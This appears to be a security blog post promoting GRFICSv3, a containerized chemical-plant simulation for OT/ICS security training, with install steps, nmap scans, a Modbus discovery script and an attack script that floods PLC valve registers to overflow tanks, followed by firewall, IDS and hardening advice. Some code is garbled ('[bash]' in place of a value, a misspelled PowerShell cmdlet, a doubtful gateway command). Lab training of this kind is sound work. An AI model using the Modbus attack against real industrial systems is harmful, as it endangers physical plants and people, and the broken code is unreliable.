Listen to this Post
Introduction:
Operational Technology (OT) and Industrial Control Systems (ICS) form the backbone of modern civilization—power grids, water treatment facilities, chemical plants, and manufacturing lines all depend on them. Yet these environments remain dangerously exposed, with legacy protocols like Modbus lacking basic authentication and air gaps dissolving into convenience-driven network connections. The barrier to learning OT security has traditionally been brutal: physical PLC racks cost tens of thousands of dollars, and real industrial testbeds are inaccessible to most educators, students, and self-directed learners. GRFICSv3 (Graphical Realism Framework for Industrial Control Simulation Version 3) demolishes this wall entirely—a fully containerized, open-source OT security lab that simulates an entire chemical plant inside Docker, complete with 3D visualization, real industrial protocols, and integrated attack-and-defense tooling.
Learning Objectives:
- Deploy a complete OT/ICS security laboratory on a local machine using Docker Compose, eliminating the need for expensive hardware
- Execute reconnaissance, enumeration, and process manipulation attacks against a realistic chemical plant simulation
- Implement defensive controls including firewall rules, intrusion detection system (IDS) configuration, and network segmentation following the Purdue Model
- Identify physical security vulnerabilities and cyber hygiene failures through first-person virtual walkthroughs
- Automate adversary emulation using MITRE Caldera with OT-specific plugins
You Should Know:
- GRFICSv3 Architecture: The Digital Chemical Plant in a Container
GRFICSv3 is not a toy—it is a full-fledged cyber-physical simulation that brings together realistic process dynamics, industrial protocols (Modbus TCP), engineering workstations, Human-Machine Interfaces (HMIs), Programmable Logic Controllers (PLCs), and attacker infrastructure all inside Docker containers. The environment models a chemical plant with tanks, valves, and a continuous process where manipulating control logic produces visible consequences in the 3D Unity-based visualization.
The architecture follows the Purdue Model for ICS networking:
- ICS Network (192.168.95.0/24): Contains the PLC (192.168.95.2), simulation engine (192.168.95.45), and engineering workstation (192.168.95.5)
- DMZ Network (192.168.90.0/24): Hosts the Kali attacker container (192.168.90.6)
- Router/Firewall: Runs iptables and Suricata IDS, controlling all traffic between zones
Every component is launched with a single command: docker compose up -d. The entire industrial environment—valves, tanks, PLC logic, HMI screens, and attack infrastructure—springs to life in your browser.
Step‑by‑Step Installation:
Prerequisites: Linux (native, VM, or WSL2) with Docker and Docker Compose Remove conflicting packages (Debian/Ubuntu) sudo apt remove docker.io docker-compose docker-compose-v2 docker-doc podman-docker containerd runc Install Docker sudo apt update sudo apt install ca-certificates curl sudo install -m 0755 -d /etc/apt/keyrings sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc sudo chmod a+r /etc/apt/keyrings/docker.asc Clone and launch GRFICSv3 git clone https://github.com/Fortiphyd/GRFICSv3.git cd GRFICSv3 docker compose up -d docker compose ps Verify all containers are "Up"
Access the HMI at http://localhost:8080` and the attacker workstation athttp://localhost:8081`. The 3D plant visualization renders directly in your browser, showing tank levels, valve positions, and real-time process responses.
2. Reconnaissance and Enumeration: Mapping the Industrial Network
Before launching any attack, intelligence gathering is paramount. As the Stuxnet campaign demonstrated, the exploitation is the last mile—reconnaissance is the actual work. In GRFICSv3, the Kali container sits on the DMZ network, providing a realistic starting point for enumeration.
Step‑by‑Step Network Mapping:
From the Kali attacker container, begin with passive observation and progress to active scanning:
Enter the Kali container docker exec -it <kali-container-id> /bin/bash Scan the DMZ network (where you already are) nmap -Pn -sT -T2 --max-retries 1 -p502,8080,102,44818,4840 192.168.90.0/24 Traceroute to identify network boundaries traceroute 192.168.95.2 Scan through the router into the ICS network nmap -sT -T2 --max-retries 1 -p502,8080,102,44818,4840 192.168.95.0/24
The Modbus TCP protocol (port 502) is almost always exposed in these environments. In GRFICSv3, the router forwards traffic by default (FORWARD ACCEPT), enabling scanning across network boundaries. A successful scan reveals PLCs, HMIs, and engineering workstations—often with default credentials and no authentication required.
Modbus Discovery Script:
from pymodbus.client import ModbusTcpClient
Scan for Modbus devices
for ip in ["192.168.95.2", "192.168.95.10", "192.168.95.11", "192.168.95.12", "192.168.95.13"]:
client = ModbusTcpClient(ip, port=502, timeout=1)
if client.connect():
print(f"[+] Modbus device found at {ip}")
client.close()
3. Process Manipulation: Making the Tanks Overflow
The most vivid learning experience in GRFICSv3 is watching your attack succeed in real-time 3D. By overwriting PLC control values, you can force valves open or closed, causing tank levels to rise until chemical product overflows—all visible in the browser.
Step‑by‑Step Modbus Attack Execution:
The following Python script, executed from the Kali attacker container, continuously writes valve positions to override legitimate PLC control logic:
import time
from pymodbus.client import ModbusTcpClient
def main():
interval = 0.0005 Shorter than PLC control cycle
unit_id = 247
address = 1
Target: Valve A (open 100%), Valve B (open 100%), Purge Valve (closed), Product Valve (closed)
targets = [
("192.168.95.10", 502, 65535), Valve A - full open
("192.168.95.11", 502, 65535), Valve B - full open
("192.168.95.12", 502, 0), Purge Valve - closed
("192.168.95.13", 502, 0), Product Valve - closed
]
clients = [ModbusTcpClient(host, port=port, timeout=2) for host, port, _ in targets]
for c in clients:
c.connect()
Continuously overwrite PLC values to maintain attack state
while True:
for c, (_, _, value) in zip(clients, targets):
c.write_registers(address, [bash], slave=unit_id)
time.sleep(interval)
if <strong>name</strong> == "<strong>main</strong>":
main()
Save this as `attack_modbus.py` on the attacker machine and execute with python3 attack_modbus.py. Watch the 3D visualization as tank pressure rises and chemical product begins to overflow.
4. Defensive Controls: Firewall Rules and Suricata IDS
Every attack in GRFICSv3 can be detected and mitigated. The environment includes a custom firewall and Suricata IDS interface, providing hands-on defensive training.
Step‑by‑Step Mitigation with iptables:
Implement rate-limiting and access controls on the OT gateway to block reconnaissance and attack traffic:
Rate-limit Modbus connections (max 3 simultaneous from a single source) sudo iptables -A INPUT -p tcp --dport 502 -m connlimit --connlimit-above 3 --connlimit-mask 32 -j DROP Log suspicious Modbus traffic for analysis sudo iptables -A INPUT -p tcp --dport 502 -j LOG --log-prefix "MODBUS_SCAN: " Block unauthorized subnets from accessing Modbus sudo iptables -A FORWARD -p tcp --dport 502 -s 192.168.1.0/24 -j DROP Allow only specific engineering workstations sudo iptables -A FORWARD -p tcp --dport 502 -s 192.168.95.5 -j ACCEPT sudo iptables -A FORWARD -p tcp --dport 502 -j DROP
Suricata IDS Configuration:
Suricata runs inline between the DMZ and ICS networks, inspecting all traffic. To detect Modbus scanning:
Verify Suricata is running docker ps | grep suricata Check Suricata logs for alerts docker exec -it <suricata-container> cat /var/log/suricata/fast.log Look for alerts indicating port scans or anomalous Modbus traffic
For Windows environments using Docker Desktop, the same iptables concepts translate to PowerShell IPSec policies:
New-1etIPsecRule -DisplayName "Allow Only Engineering VLAN" -RemoteAddress 10.0.10.0/24 -Protocol TCP -LocalPort 502 -Action Allow
5. Physical Vulnerabilities and First-Person Walkthroughs
One of GRFICSv3’s most innovative pedagogical features is the first-person virtual walkthrough mode. You explore the plant and warehouse as if physically present, hunting for the classic security failures that plague real industrial environments:
- Passwords written on sticky notes attached to monitors
- Security doors propped open with fire extinguishers
- Unlocked control cabinets exposing network equipment
- Zero physical separation between IT and OT spaces
The “Vulnerabilities Found” counter in the top-left corner tracks discoveries and assigns a score—gamifying the learning experience. This approach bridges the gap between cyber and physical security, teaching that OT security is not just about firewalls and patches but also about physical access controls and human behavior.
6. MITRE Caldera Integration: Automating Adversary Emulation
GRFICSv3 natively integrates MITRE Caldera, a cybersecurity platform designed to automate adversary emulation, assist red teams, and automate incident response. The OT plugin extends Caldera with industrial protocols including BACnet, DNP3, Modbus, Profinet, and IEC61850.
Step‑by‑Step Caldera Automation:
- Access the Caldera web interface (exposed on a configured port)
- Create a new operation targeting the ICS network
- Deploy adversary profiles that emulate real-world threat actors
- Automate the attack chain: reconnaissance → initial access → command and control → impact
5. Monitor defensive responses and generate after-action reports
Caldera’s Debrief plugin provides campaign analytics and operational insights, making it invaluable for both training and red-team exercises. The combination of GRFICSv3’s realistic simulation with Caldera’s automation capabilities enables continuous security validation without risking physical equipment.
7. Hardening OT Networks: From Theory to Practice
The lessons learned in GRFICSv3 translate directly to real-world OT security practices. Following the ISA/IEC 62443 and NIST SP 800-82 frameworks, practitioners can implement compensatory controls:
Modbus Security (MBsec) Gateway:
Deploy a Modbus security gateway with authentication mbsecd --listen 802 --backend 192.168.1.10:502 --cert server.crt
Network Segmentation:
- Place all ICS devices on isolated VLANs
- Implement unidirectional gateways (data diodes) where possible
- Restrict engineering workstation access to specific IP ranges
- Deploy industrial IDS/IPS solutions like OsecT for protocol-aware monitoring
Continuous Monitoring:
- Log all Modbus transactions and alert on anomalous function codes
- Deploy Sigma rules for abnormal Modbus activity detection
- Implement asset discovery and inventory management
- Conduct regular vulnerability assessments using the GRFICSv3 lab as a safe testing ground
What Undercode Say:
- Key Takeaway 1: GRFICSv3 democratizes OT security education. What once required tens of thousands of dollars in hardware and access to physical industrial facilities can now be spun up on any laptop with Docker. The containerized architecture—moving from VirtualBox VMs in v2 to lightweight containers in v3—makes deployment faster, scaling easier, and maintenance simpler. This is not just a training tool; it is a paradigm shift in how we prepare the next generation of industrial cybersecurity professionals.
-
Key Takeaway 2: The integration of offensive (Kali, Caldera) and defensive (Suricata, firewall) tooling within a single environment creates a complete cyber range. Learners can attack, defend, and iterate in minutes rather than days. The 3D visualization provides immediate feedback—you see the physical consequences of your actions, making abstract cyber concepts tangible. The first-person walkthrough mode adds a crucial layer: physical security is half the battle in OT environments, and GRFICSv3 teaches that lesson effectively.
Analysis: The release of GRFICSv3 by Fortiphyd Logic represents a maturation of the open-source OT security ecosystem. Previous versions were valuable but cumbersome; v3’s containerization makes it accessible to anyone with a modern laptop and an internet connection. The project addresses a critical gap in cybersecurity education: while thousands are trained to secure web applications and corporate networks, far fewer understand the unique challenges of protecting the systems that keep lights on, water flowing, and factories running. By making realistic OT training free and open, GRFICSv3 accelerates skill development and broadens the pipeline of qualified industrial security professionals. The gamification elements—vulnerability counters, scoring, visible process consequences—increase engagement and retention, particularly for self-directed learners.
Prediction:
- +1 By 2028, AI-powered offensive tools will automate Modbus fuzzing and zero-day discovery in legacy PLCs, forcing a rapid decline in insecure “brownfield” deployments. The demand for professionals who mastered simulated labs like GRFICSv3 will surge beyond traditional IT security salaries.
-
+1 Open-source OT simulation platforms will become the standard for industrial cybersecurity training, displacing proprietary, hardware-dependent courses. Organizations that adopt these tools will shorten incident response times from days to hours.
-
-1 The gap between simulated and physical training remains significant—pneumatic valves and real-world physics behave differently than simulated registers. Future practitioners must complement virtual drills with at least one real PLC bench to develop full competence.
-
-1 Legacy brownfield deployments—particularly in water utilities and energy sectors—will continue to operate with insecure protocols and unpatched vulnerabilities, creating persistent risk that no amount of simulation can immediately resolve.
Project Links & Resources:
- GRFICSv3 GitHub: https://github.com/Fortiphyd/GRFICSv3
- Installation Walkthrough Video: https://youtu.be/X7YYCLJxMmo
- GRFICSv3 Announcement: https://lnkd.in/erp2DbC2
- Fortiphyd Logic Learning Platform: https://learn.fortiphyd.com
Build. Break. Defend. Learn. And occasionally, make a chemical tank overflow without alerting anyone. 🧪
▶️ Related Video (64% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Laurent Biagiotti – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
